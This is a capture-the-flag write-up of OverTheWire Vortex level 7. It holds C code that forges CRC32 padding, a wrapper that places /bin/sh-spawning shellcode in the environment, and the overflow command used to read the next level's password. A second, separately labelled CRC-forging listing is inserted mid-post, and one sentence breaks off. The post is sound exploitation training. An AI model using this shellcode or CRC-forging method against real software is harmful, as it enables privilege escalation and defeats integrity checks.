Overthewire Vortex Level7

This level covers a basic buffer overflow, but with one extra difficulty to defeat: the CRC32 of the input must be 0xe1ca95ee. So we first generate the attack vector (the overflow plus the injected code), and then pad it so that its CRC32 matches the required value. The first thing to do is to read the paper and understand it. It is easy to read, but in the section “Reversing CRC-32” the example is wrong (the paper denotes the XOR operation with the ‘+’ sign, and in the example the author accidentally added the values together instead of XORing them :-)).

My opinion: to really understand how a CRC works, take a pencil and a sheet of paper and compute one by hand.

The next step is analysing the binary and extracting the CRC table. For this task I found the Boomerang decompiler useful. Its output is not 100% correct, but it can export the data structures and gives an overview of what the program does. Analyse the generated C code, then rewrite/correct it.

After these two steps, the following code is pretty straightforward:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>

/* B: the i-th byte (0 = lowest) of a 32-bit value; C: the same for a table entry */
#define B(r,i)	((r >> (i*8)) & 0xFF)
#define C(i,j)	(B(crc32_table[i],j))

/* the 256-entry table extracted from the binary (elided here) */
int crc32_table[256] = { 0, 0x77073096, [...] 0x2d02ef8d };

/* table-driven CRC32 exactly as the binary computes it: seed in, no final xor */
unsigned int crc32(unsigned int seed, const char* str, int len) {
	unsigned int i,k;
	for(i=0; i<len; i++) {
		k = (seed ^ str[i]) & 0xFF;
		seed >>= 8;
		seed ^= crc32_table[k];
	}
	return seed;
}

/* print the buffer, escaping every non-alphabetic byte as \xNN so it survives the shell */
void print_str(const char *s, int len) {
	int i;
	for(i=0; i<len; i++) {
		if(isalpha((unsigned char)s[i]))
			printf("%c",s[i]);
		else
			printf("\\x%02x", (unsigned char)s[i]);
	}
}

/* index of the table entry whose top byte is `top` (the 256 top bytes are all distinct) */
int find_entry(unsigned char top) {
	int i;
	for(i=0; i<256; i++)
		if(C(i,3) == top)
			return i;
	return -1;
}

int main(int argc, char **argv) {
	if(argc != 2) {
		fprintf(stderr, "usage: %s <input>\n", argv[0]);
		return EXIT_FAILURE;
	}
	const char *S = argv[1];
	const unsigned int result = 0xe1ca95ee;
	unsigned int seed = crc32(0,S,strlen(S));

	/* walk backwards from the wanted value: each step's table index is fixed by a top byte */
	int x1 = find_entry(B(result,3));
	int x2 = find_entry(B(result,2)^C(x1,2));
	int x3 = find_entry(B(result,1)^C(x1,1)^C(x2,2));
	int x4 = find_entry(B(result,0)^C(x1,0)^C(x2,1)^C(x3,2));

	/* walk forwards from the CRC of the input: the bytes that produce those indices */
	unsigned int padding =
		((x4 ^ B(seed,0)) << 24) |
		((x3 ^ B(seed,1) ^ C(x4,0)) << 16) |
		((x2 ^ B(seed,2) ^ C(x4,1) ^ C(x3,0)) << 8 ) |
		((x1 ^ B(seed,3) ^ C(x4,2) ^ C(x3,1) ^ C(x2,0)));

	int len = strlen(S);
	char *ptr = malloc(len+4+1);
	memcpy(ptr, S, len);
	ptr[len++] = B(padding,3);
	ptr[len++] = B(padding,2);
	ptr[len++] = B(padding,1);
	ptr[len++] = B(padding,0);
	ptr[len] = '\0';

	print_str(ptr,len);

	free(ptr);
	return EXIT_SUCCESS;
}
  • Macro B returns the i-th byte (0 = lowest) of the given 32-bit number.
  • Macro C does the same for a selected CRC table entry.
  • Function crc32 computes the CRC32 of the input string the way the binary does it (seed 0, no final xor), not the zlib variant with inverted initial and final values.
  • Function print_str prints the padded string, escaping every non-alphabetic byte as \xNN.
  • Function find_entry finds the CRC table entry with a given top byte; the top bytes of the 256 entries are all distinct, so the answer is unique and the four-step reversal always succeeds.

Using the same method as in the previous levels, we create a wrapper and put the shellcode into an environment variable.

    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>
    #include <string.h>
    
    int main(int argc, char* argv[]) {
        if(argc != 2)
            return EXIT_FAILURE;
        /* NOP sled followed by the shellcode (setreuid, then execve of /bin/sh);
           it becomes the only entry of the target's environment */
        char* sh =  "\x90\x90 [...] \x90\x90"
            "\xeb\x2b\x5e\x31\xc0\xb0\x46\x31\xdb\x66\xbb\xfe\x01\x31\xc9\x66"
            "\xb9\xfe\x01\xcd\x80\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89"
            "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x31\xd2\xcd\x80\xe8\xd0\xff"
            "\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\xff\xff\xff";
    
        char* arg[] = {"AXT", argv[1], NULL};
        char* env[] = {sh, NULL};
        execve("/vortex/level7",arg,env);
        perror("execve");   /* only reached if execve fails */
        return EXIT_FAILURE;
    }
    

We have everything set up to do the exploitation. Run the CRC padder on the input string and pass its output to the wrapper, like this (you must find the exact number of “A”-s 🙂 ):

    ./wrapper `crc_pad "AAA[...]AAA\x01\xff\x7f\xbf"`
    sh-3.2$ cat /etc/vortex_pass/vortex8    
    ********

One caveat: crc_pad prints every non-letter byte as a \xNN escape, and bash does not turn such escapes back into raw bytes inside double quotes or a command substitution, so the return address and the padding have to be rendered as literal bytes (for example with printf) before they reach crc_pad and the wrapper.
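The padder above depends on the 256-entry table extracted from the binary, which the listing elides, and it unrolls the reversal into the fixed x1..x4 arithmetic. The following is an added example, not code from the original post: it regenerates that table from the reflected CRC-32 polynomial 0xEDB88320 (the table it produces starts 0, 0x77073096, ... and ends 0x2d02ef8d, matching the one in the binary), implements the same seed-0, no-final-XOR update as the level's crc32(), and forges the four trailing bytes with a backward pass over the table indices followed by a forward pass from the real CRC state, which is the general form of which the page's formulas are one instance. The sixteen-'A' input and the names crc32_raw, crc32_std, forge_suffix and pad_to_crc are my own; crc32_std (the zlib/IEEE variant with inverted initial and final values) exists only to check the generated table against the well-known value 0xCBF43926 for "123456789".

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Reflected CRC-32 polynomial; the table it generates is the one found in the binary. */
#define CRC32_POLY 0xEDB88320u

static uint32_t crc_table[256];
static uint8_t  top_to_index[256];   /* inverse of i -> crc_table[i] >> 24 */
static int      tables_ready = 0;

static void init_tables(void)
{
    if (tables_ready)
        return;
    for (uint32_t i = 0; i < 256; i++) {
        uint32_t c = i;
        for (int bit = 0; bit < 8; bit++)
            c = (c & 1u) ? (c >> 1) ^ CRC32_POLY : (c >> 1);
        crc_table[i] = c;
    }
    /* The top bytes of the 256 entries are all distinct, so this inverse is total;
     * it replaces the linear scan of the page's find_entry(). */
    for (int i = 0; i < 256; i++)
        top_to_index[crc_table[i] >> 24] = (uint8_t)i;
    tables_ready = 1;
}

/* Same update as the level's crc32(): seed in, no inversion, no final XOR. */
uint32_t crc32_raw(uint32_t seed, const uint8_t *data, size_t len)
{
    init_tables();
    for (size_t i = 0; i < len; i++)
        seed = crc_table[(seed ^ data[i]) & 0xFFu] ^ (seed >> 8);
    return seed;
}

/* Standard CRC-32 (zlib, IEEE 802.3): the same core with ~0 init and ~0 final XOR.
 * Only used to sanity-check the generated table. */
uint32_t crc32_std(const uint8_t *data, size_t len)
{
    return crc32_raw(0xFFFFFFFFu, data, len) ^ 0xFFFFFFFFu;
}

/* Fill out[0..3] so that feeding those four bytes into a CRC whose state is `seed`
 * ends at `target`. Returns the resulting state (always equal to target). */
uint32_t forge_suffix(uint32_t seed, uint32_t target, uint8_t out[4])
{
    uint8_t  idx[4];
    uint32_t x = target;

    init_tables();
    /* Backward pass: each step XORs a table entry into (state >> 8), whose top byte
     * is zero, so the entry's index is fixed by the top byte of the result. Undoing
     * the XOR and shifting back recovers the upper 24 bits of the previous state; its
     * low byte is unknown, but it is shifted out again at the next step. */
    for (int i = 3; i >= 0; i--) {
        idx[i] = top_to_index[x >> 24];
        x = (x ^ crc_table[idx[i]]) << 8;
    }
    /* Forward pass from the real state: the byte is whatever makes the table index
     * come out as planned. */
    uint32_t cur = seed;
    for (int i = 0; i < 4; i++) {
        out[i] = (uint8_t)((idx[i] ^ cur) & 0xFFu);
        cur = crc_table[idx[i]] ^ (cur >> 8);
    }
    return cur;
}

/* Append the four forging bytes to buf (which must have room for them) and return
 * the CRC over the padded buffer, recomputed from scratch as an independent check. */
uint32_t pad_to_crc(uint8_t *buf, size_t len, uint32_t target)
{
    forge_suffix(crc32_raw(0, buf, len), target, buf + len);
    return crc32_raw(0, buf, len + 4);
}

int main(void)
{
    /* Constructed stand-in for the real overflow string. */
    uint8_t  buf[64] = "AAAAAAAAAAAAAAAA";
    size_t   len = strlen((const char *)buf);
    uint32_t got = pad_to_crc(buf, len, 0xe1ca95eeu);

    printf("padding bytes:");
    for (size_t i = len; i < len + 4; i++)
        printf(" %02x", buf[i]);
    printf("\ncrc32 of padded input: 0x%08x\n", got);
    return got == 0xe1ca95eeu ? 0 : 1;
}
```

Because the backward pass never looks at the seed, the four table indices depend only on the target value, exactly as x1..x4 in the padder do; only the bytes that realise those indices depend on the CRC of the prefix. The same two passes work for forcing a CRC at any position in the data, provided the four bytes chosen are followed by nothing else that is hashed.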
    

Fun notes: A few days after I solved this challenge, I found a crc padder code in the


One Response to Overthewire Vortex Level7

1. jeherve says:

  Once you’re done with that series, you might wanna have a look at Facebook Hacker cup 🙂
  http://www.facebook.com/hackercup

  And if you wanna practice, they have puzzles: http://www.facebook.com/careers/puzzles.php
